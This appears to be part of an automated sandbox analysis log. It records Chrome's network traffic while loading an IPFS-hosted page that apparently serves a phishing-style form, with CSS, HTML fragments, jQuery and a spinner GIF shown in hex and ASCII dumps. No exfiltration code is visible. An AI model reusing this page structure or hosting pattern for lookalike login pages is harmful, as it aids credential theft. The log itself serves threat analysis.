2025-01-16 00:32:59 UTC	1369	IN	Data Raw: 20 6d 69 64 64 6c 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6c 31 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 32 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 33 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6c 32 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 32 38 36 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6c 32 20 69 6e 70 75 74 20 7b 0d 0a 20 20 20 Data Ascii: middle; padding-top: 4px; } .col1 { width: 124px; font-size: 13px; font-weight: 600; } .col2 { width: 286px; } .col2 input {
2025-01-16 00:32:59 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 35 30 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 39 30 70 78 20 61 75 74 6f 20 61 75 74 6f 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 0d 0a 20 20 20 20 20 20 20 20 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 36 30 30 70 78 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 6e 6f 6e 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: width: 500px; margin: 90px auto auto auto; padding-left: 10px; } @media only screen and (max-width: 600px) { body { background-image: none; }
2025-01-16 00:32:59 UTC	1369	IN	Data Raw: 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 32 35 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 78 6c 6f 67 6f 20 69 6d 67 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 35 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 35 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6f 62 6a 65 63 74 2d 66 69 74 3a 20 63 6f 6e 74 61 69 6e 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 78 6c 6f 67 6f 20 73 70 61 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 0d 0a 20 20 20 20 20 20 20 Data Ascii: margin-top: -25px; } .xlogo img { vertical-align: middle; width: 5%; height: 5%; object-fit: contain } .xlogo span { vertical-align: middle
2025-01-16 00:32:59 UTC	1369	IN	Data Raw: 3b 20 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 20 69 64 3d 22 62 67 5f 73 63 72 65 65 6e 22 3e 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 6b 2e 69 6d 61 67 65 6b 69 74 2e 69 6f 2f 65 73 63 72 6f 77 6d 61 64 65 2f 52 6f 6c 6c 69 6e 67 2d 31 73 2d 32 30 30 70 78 5f 5f 31 5f 5f 74 72 48 43 57 58 79 39 6a 44 2e 67 69 66 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 35 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 35 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 20 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 20 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 20 69 64 3d 22 6c 6f 61 64 69 6e 67 5f 69 6d 61 67 65 22 Data Ascii: ; display:none" id="bg_screen"> </div> <img src="https://ik.imagekit.io/escrowmade/Rolling-1s-200px__1__trHCWXy9jD.gif" style="width:50px; position:absolute; top:50%; left:50%; transform:translate(-50%, -50%); display:none" id="loading_image"
2025-01-16 00:32:59 UTC	1369	IN	Data Raw: 72 64 5f 68 69 64 64 65 6e 3a 39 33 65 64 66 37 64 33 63 65 62 37 30 34 62 65 39 32 65 65 30 38 34 65 63 63 36 32 63 36 63 38 2f 22 20 61 6c 74 3d 22 22 20 6f 6e 63 6c 69 63 6b 3d 22 73 65 74 56 69 73 69 62 69 6c 69 74 79 28 29 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 72 3e 3c 62 72 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 20 69 64 3d 22 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 Data Ascii: rd_hidden:93edf7d3ceb704be92ee084ecc62c6c8/" alt="" onclick="setVisibility()"> </div> <br><br> <div class="row"> <div><span class="error" id="error"></span></div> </div> <di
2025-01-16 00:32:59 UTC	1369	IN	Data Raw: 6f 6d 2f 76 30 2f 62 2f 70 6f 72 74 61 6c 2d 61 61 33 36 33 2e 61 70 70 73 70 6f 74 2e 63 6f 6d 2f 6f 2f 66 61 76 69 63 6f 6e 73 2e 70 6e 67 3f 61 6c 74 3d 6d 65 64 69 61 26 74 6f 6b 65 6e 3d 38 30 35 66 62 30 65 66 2d 61 32 64 39 2d 34 61 37 66 2d 38 35 65 36 2d 64 36 38 33 38 34 65 31 36 36 65 33 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 63 61 70 69 74 61 6c 69 7a 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 22 20 63 6c 61 73 73 3d 27 74 65 78 74 2d 67 27 20 69 64 3d 22 62 61 6e 4e 65 72 22 3e 3c 2f 73 70 61 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 Data Ascii: om/v0/b/portal-aa363.appspot.com/o/favicons.png?alt=media&token=805fb0ef-a2d9-4a7f-85e6-d68384e166e3"> <span style="text-transform: capitalize !important;" class='text-g' id="banNer"></span> </div> <div class

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49741	151.101.194.137	443	3180	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-16 00:32:59 UTC	547	OUT	GET /jquery-2.2.4.min.js HTTP/1.1 Host: code.jquery.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: https://ipfs.io sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: script Referer: https://ipfs.io/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-16 00:32:59 UTC	567	IN	HTTP/1.1 200 OK Connection: close Content-Length: 85578 Server: nginx Content-Type: application/javascript; charset=utf-8 Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT ETag: "28feccc0-14e4a" Cache-Control: public, max-age=31536000, stale-while-revalidate=604800 Access-Control-Allow-Origin: * Via: 1.1 varnish, 1.1 varnish Accept-Ranges: bytes Date: Thu, 16 Jan 2025 00:32:59 GMT Age: 2479150 X-Served-By: cache-lga21935-LGA, cache-nyc-kteb1890059-NYC X-Cache: HIT, HIT X-Cache-Hits: 39, 2 X-Timer: S1736987580.736843,VS0,VE0 Vary: Accept-Encoding
2025-01-16 00:32:59 UTC	1378	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 32 2e 32 2e 34 20 7c 20 28 63 29 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77 69 74 68 20 61 20 64 6f 63 75 6d 65 6e Data Ascii: /! jQuery v2.2.4 \| (c) jQuery Foundation \| jquery.org/license /!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a documen
2025-01-16 00:32:59 UTC	1378	IN	Data Raw: 2c 63 2c 64 2c 65 2c 66 2c 67 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 7c 7c 7b 7d 2c 68 3d 31 2c 69 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 6a 3d 21 31 3b 66 6f 72 28 22 62 6f 6f 6c 65 61 6e 22 3d 3d 74 79 70 65 6f 66 20 67 26 26 28 6a 3d 67 2c 67 3d 61 72 67 75 6d 65 6e 74 73 5b 68 5d 7c 7c 7b 7d 2c 68 2b 2b 29 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 7c 7c 6e 2e 69 73 46 75 6e 63 74 69 6f 6e 28 67 29 7c 7c 28 67 3d 7b 7d 29 2c 68 3d 3d 3d 69 26 26 28 67 3d 74 68 69 73 2c 68 2d 2d 29 3b 69 3e 68 3b 68 2b 2b 29 69 66 28 6e 75 6c 6c 21 3d 28 61 3d 61 72 67 75 6d 65 6e 74 73 5b 68 5d 29 29 66 6f 72 28 62 20 69 6e 20 61 29 63 3d 67 5b 62 5d 2c 64 3d 61 5b 62 5d 2c 67 21 3d 3d 64 26 26 28 6a 26 26 64 26 26 28 6e 2e 69 73 50 6c 61 Data Ascii: ,c,d,e,f,g=arguments[0]\|\|{},h=1,i=arguments.length,j=!1;for("boolean"==typeof g&&(j=g,g=arguments[h]\|\|{},h++),"object"==typeof g\|\|n.isFunction(g)\|\|(g={}),h===i&&(g=this,h--);i>h;h++)if(null!=(a=arguments[h]))for(b in a)c=g[b],d=a[b],g!==d&&(j&&d&&(n.isPla
2025-01-16 00:32:59 UTC	1378	IN	Data Raw: 2d 22 29 2e 72 65 70 6c 61 63 65 28 71 2c 72 29 7d 2c 6e 6f 64 65 4e 61 6d 65 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 2e 6e 6f 64 65 4e 61 6d 65 26 26 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 2c 64 3d 30 3b 69 66 28 73 28 61 29 29 7b 66 6f 72 28 63 3d 61 2e 6c 65 6e 67 74 68 3b 63 3e 64 3b 64 2b 2b 29 69 66 28 62 2e 63 61 6c 6c 28 61 5b 64 5d 2c 64 2c 61 5b 64 5d 29 3d 3d 3d 21 31 29 62 72 65 61 6b 7d 65 6c 73 65 20 66 6f 72 28 64 20 69 6e 20 61 29 69 66 28 62 2e 63 61 6c 6c 28 61 5b 64 5d 2c 64 2c 61 5b 64 5d 29 3d 3d 3d 21 31 29 62 72 65 61 6b 3b 72 65 74 75 72 6e Data Ascii: -").replace(q,r)},nodeName:function(a,b){return a.nodeName&&a.nodeName.toLowerCase()===b.toLowerCase()},each:function(a,b){var c,d=0;if(s(a)){for(c=a.length;c>d;d++)if(b.call(a[d],d,a[d])===!1)break}else for(d in a)if(b.call(a[d],d,a[d])===!1)break;return
2025-01-16 00:32:59 UTC	1378	IN	Data Raw: 3d 6e 2e 74 79 70 65 28 61 29 3b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 63 7c 7c 6e 2e 69 73 57 69 6e 64 6f 77 28 61 29 3f 21 31 3a 22 61 72 72 61 79 22 3d 3d 3d 63 7c 7c 30 3d 3d 3d 62 7c 7c 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 62 26 26 62 3e 30 26 26 62 2d 31 20 69 6e 20 61 7d 76 61 72 20 74 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 2c 63 2c 64 2c 65 2c 66 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 70 2c 71 2c 72 2c 73 2c 74 2c 75 3d 22 73 69 7a 7a 6c 65 22 2b 31 2a 6e 65 77 20 44 61 74 65 2c 76 3d 61 2e 64 6f 63 75 6d 65 6e 74 2c 77 3d 30 2c 78 3d 30 2c 79 3d 67 61 28 29 2c 7a 3d 67 61 28 29 2c 41 3d 67 61 28 29 2c 42 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 3d 3d 3d Data Ascii: =n.type(a);return"function"===c\|\|n.isWindow(a)?!1:"array"===c\|\|0===b\|\|"number"==typeof b&&b>0&&b-1 in a}var t=function(a){var b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u="sizzle"+1*new Date,v=a.document,w=0,x=0,y=ga(),z=ga(),A=ga(),B=function(a,b){return a===
2025-01-16 00:32:59 UTC	1378	IN	Data Raw: 69 22 29 2c 62 6f 6f 6c 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 3f 3a 22 2b 4b 2b 22 29 24 22 2c 22 69 22 29 2c 6e 65 65 64 73 43 6f 6e 74 65 78 74 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4c 2b 22 2a 5b 3e 2b 7e 5d 7c 3a 28 65 76 65 6e 7c 6f 64 64 7c 65 71 7c 67 74 7c 6c 74 7c 6e 74 68 7c 66 69 72 73 74 7c 6c 61 73 74 29 28 3f 3a 5c 5c 28 22 2b 4c 2b 22 2a 28 28 3f 3a 2d 5c 5c 64 29 3f 5c 5c 64 2a 29 22 2b 4c 2b 22 2a 5c 5c 29 7c 29 28 3f 3d 5b 5e 2d 5d 7c 24 29 22 2c 22 69 22 29 7d 2c 58 3d 2f 5e 28 3f 3a 69 6e 70 75 74 7c 73 65 6c 65 63 74 7c 74 65 78 74 61 72 65 61 7c 62 75 74 74 6f 6e 29 24 2f 69 2c 59 3d 2f 5e 68 5c 64 24 2f 69 2c 5a 3d 2f 5e 5b 5e 7b 5d 2b 5c 7b 5c 73 2a 5c 5b 6e 61 74 69 76 65 20 5c 77 2f 2c 24 3d 2f 5e 28 3f 3a 23 28 Data Ascii: i"),bool:new RegExp("^(?:"+K+")$","i"),needsContext:new RegExp("^"+L+"[>+~]\|:(even\|odd\|eq\|gt\|lt\|nth\|first\|last)(?:\$"+L+"((?:-\\d)?\\d)"+L+"\$\|)(?=[^-]\|$)","i")},X=/^(?:input\|select\|textarea\|button)$/i,Y=/^h\d$/i,Z=/^[^{]+\{\s*\[native \w/,$=/^(?:#(
2025-01-16 00:32:59 UTC	1378	IN	Data Raw: 43 61 73 65 28 29 29 7b 28 6b 3d 62 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 6b 3d 6b 2e 72 65 70 6c 61 63 65 28 61 61 2c 22 5c 5c 24 26 22 29 3a 62 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 6b 3d 75 29 2c 72 3d 67 28 61 29 2c 68 3d 72 2e 6c 65 6e 67 74 68 2c 6c 3d 56 2e 74 65 73 74 28 6b 29 3f 22 23 22 2b 6b 3a 22 5b 69 64 3d 27 22 2b 6b 2b 22 27 5d 22 3b 77 68 69 6c 65 28 68 2d 2d 29 72 5b 68 5d 3d 6c 2b 22 20 22 2b 71 61 28 72 5b 68 5d 29 3b 73 3d 72 2e 6a 6f 69 6e 28 22 2c 22 29 2c 77 3d 5f 2e 74 65 73 74 28 61 29 26 26 6f 61 28 62 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 62 7d 69 66 28 73 29 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 64 2c 77 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 73 Data Ascii: Case()){(k=b.getAttribute("id"))?k=k.replace(aa,"\\$&"):b.setAttribute("id",k=u),r=g(a),h=r.length,l=V.test(k)?"#"+k:"[id='"+k+"']";while(h--)r[h]=l+" "+qa(r[h]);s=r.join(","),w=_.test(a)&&oa(b.parentNode)\|\|b}if(s)try{return H.apply(d,w.querySelectorAll(s
2025-01-16 00:32:59 UTC	1378	IN	Data Raw: 29 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3b 72 65 74 75 72 6e 20 62 3f 22 48 54 4d 4c 22 21 3d 3d 62 2e 6e 6f 64 65 4e 61 6d 65 3a 21 31 7d 2c 6d 3d 66 61 2e 73 65 74 44 6f 63 75 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 2c 65 2c 67 3d 61 3f 61 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 61 3a 76 3b 72 65 74 75 72 6e 20 67 21 3d 3d 6e 26 26 39 3d 3d 3d 67 2e 6e 6f 64 65 54 79 70 65 26 26 67 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3f 28 6e 3d 67 2c 6f 3d 6e 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 70 3d 21 66 28 6e 29 2c 28 65 3d 6e 2e 64 65 66 61 75 6c 74 56 69 65 77 29 26 26 65 2e 74 6f 70 21 3d 3d 65 26 26 28 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 65 2e 61 64 64 45 76 65 6e 74 4c Data Ascii: ).documentElement;return b?"HTML"!==b.nodeName:!1},m=fa.setDocument=function(a){var b,e,g=a?a.ownerDocument\|\|a:v;return g!==n&&9===g.nodeType&&g.documentElement?(n=g,o=n.documentElement,p=!f(n),(e=n.defaultView)&&e.top!==e&&(e.addEventListener?e.addEventL
2025-01-16 00:32:59 UTC	1378	IN	Data Raw: 6e 20 66 7d 2c 64 2e 66 69 6e 64 2e 43 4c 41 53 53 3d 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 26 26 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 26 26 70 3f 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 61 29 3a 76 6f 69 64 20 30 7d 2c 72 3d 5b 5d 2c 71 3d 5b 5d 2c 28 63 2e 71 73 61 3d 5a 2e 74 65 73 74 28 6e 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 29 29 26 26 28 69 61 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 6f 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 69 64 3d 27 22 2b 75 2b 22 27 3e 3c 2f 61 Data Ascii: n f},d.find.CLASS=c.getElementsByClassName&&function(a,b){return"undefined"!=typeof b.getElementsByClassName&&p?b.getElementsByClassName(a):void 0},r=[],q=[],(c.qsa=Z.test(n.querySelectorAll))&&(ia(function(a){o.appendChild(a).innerHTML="<a id='"+u+"'></a
2025-01-16 00:32:59 UTC	1378	IN	Data Raw: 6d 65 6e 74 3a 61 2c 64 3d 62 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 61 3d 3d 3d 64 7c 7c 21 28 21 64 7c 7c 31 21 3d 3d 64 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 28 63 2e 63 6f 6e 74 61 69 6e 73 3f 63 2e 63 6f 6e 74 61 69 6e 73 28 64 29 3a 61 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 26 26 31 36 26 61 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 64 29 29 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 62 29 77 68 69 6c 65 28 62 3d 62 2e 70 61 72 65 6e 74 4e 6f 64 65 29 69 66 28 62 3d 3d 3d 61 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 42 3d 62 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 3d 3d 3d 62 29 72 65 74 75 72 6e 20 6c 3d 21 Data Ascii: ment:a,d=b&&b.parentNode;return a===d\|\|!(!d\|\|1!==d.nodeType\|\|!(c.contains?c.contains(d):a.compareDocumentPosition&&16&a.compareDocumentPosition(d)))}:function(a,b){if(b)while(b=b.parentNode)if(b===a)return!0;return!1},B=b?function(a,b){if(a===b)return l=!
2025-01-16 00:32:59 UTC	1378	IN	Data Raw: 72 48 61 6e 64 6c 65 5b 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 2c 66 3d 65 26 26 44 2e 63 61 6c 6c 28 64 2e 61 74 74 72 48 61 6e 64 6c 65 2c 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3f 65 28 61 2c 62 2c 21 70 29 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 21 3d 3d 66 3f 66 3a 63 2e 61 74 74 72 69 62 75 74 65 73 7c 7c 21 70 3f 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 62 29 3a 28 66 3d 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 62 29 29 26 26 66 2e 73 70 65 63 69 66 69 65 64 3f 66 2e 76 61 6c 75 65 3a 6e 75 6c 6c 7d 2c 66 61 2e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 53 79 6e 74 61 78 20 65 72 72 6f 72 2c 20 75 6e 72 65 63 6f 67 6e 69 7a 65 Data Ascii: rHandle[b.toLowerCase()],f=e&&D.call(d.attrHandle,b.toLowerCase())?e(a,b,!p):void 0;return void 0!==f?f:c.attributes\|\|!p?a.getAttribute(b):(f=a.getAttributeNode(b))&&f.specified?f.value:null},fa.error=function(a){throw new Error("Syntax error, unrecognize

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49742	65.9.66.107	443	3180	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-16 00:33:00 UTC	611	OUT	GET /escrowmade/Rolling-1s-200px__1__trHCWXy9jD.gif HTTP/1.1 Host: ik.imagekit.io Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ipfs.io/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-16 00:33:00 UTC	807	IN	HTTP/1.1 200 OK Content-Type: image/gif Content-Length: 55202 Connection: close access-control-allow-origin: * access-control-allow-methods: GET access-control-allow-headers: * timing-allow-origin: * x-server: ImageKit.io x-request-id: f3b958f7-e514-4441-9b79-2da1c5ddee92 Cache-Control: public, s-maxage=31536000, max-age=31536000, must-revalidate ETag: "d536d58ea2f4cfe5d5b734e7893fb09e" Last-Modified: Mon, 30 Sep 2024 19:32:04 GMT Date: Thu, 31 Oct 2024 19:52:56 GMT Via: 1.1 3a4987afa567e120a2fa0d82969d4c0a.cloudfront.net (CloudFront), 1.1 29d33c5cd70a6501fde7bc2dba557906.cloudfront.net (CloudFront) Vary: Accept X-Cache: Hit from cloudfront X-Amz-Cf-Pop: FRA56-C1 Alt-Svc: h3=":443"; ma=86400 X-Amz-Cf-Id: 3pkSKRsIDN4W-1n9wztjEv1aZtKl5YOa8Zyrf1IPApKKHbWEamLCWA== Age: 6583204
2025-01-16 00:33:00 UTC	16384	IN	Data Raw: 47 49 46 38 39 61 c8 00 c8 00 82 00 00 00 00 00 99 99 99 cb cb cb b3 b3 b3 e5 e5 e5 00 00 00 00 00 00 00 00 00 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 f9 04 09 03 00 00 00 2c 00 00 00 00 c8 00 c8 00 00 03 ff 08 ba dc fe 30 ca 49 ab bd 38 eb cd bb ff 60 28 8e 64 69 9e 68 aa ae 6c eb be 70 2c cf 74 6d df 78 ae ef 7c ef ff c0 a0 70 48 2c 1a 8f c8 a4 72 c9 6c 3a 9f d0 a8 74 4a ad 5a af d8 ac 76 cb ed 7a bf e0 30 97 20 28 0b 06 e8 41 20 20 10 bb 15 65 f5 7a 4e 9f b7 df dd 78 7d cf bf e3 b1 65 7c 82 7d 7f 56 81 83 88 75 7e 85 4f 87 89 8f 76 8c 8d 90 94 74 8b 92 48 02 95 9b 6b 97 98 44 9a 9c 9c 9e 9f 40 a1 a2 a3 a5 43 a7 a8 a9 aa 3f ac ad ae af 3c b1 b2 9b a4 b4 34 b6 b7 b8 ba 39 bc bd 95 b9 bf 2e c1 c2 c3 c5 bb c8 bd c4 ca 29 c7 cc 94 ce cf Data Ascii: GIF89a!NETSCAPE2.0!,0I8`(dihlp,tmx\|pH,rl:tJZvz0 (A ezNx}e\|}Vu~OvtHkD@C?<49.)
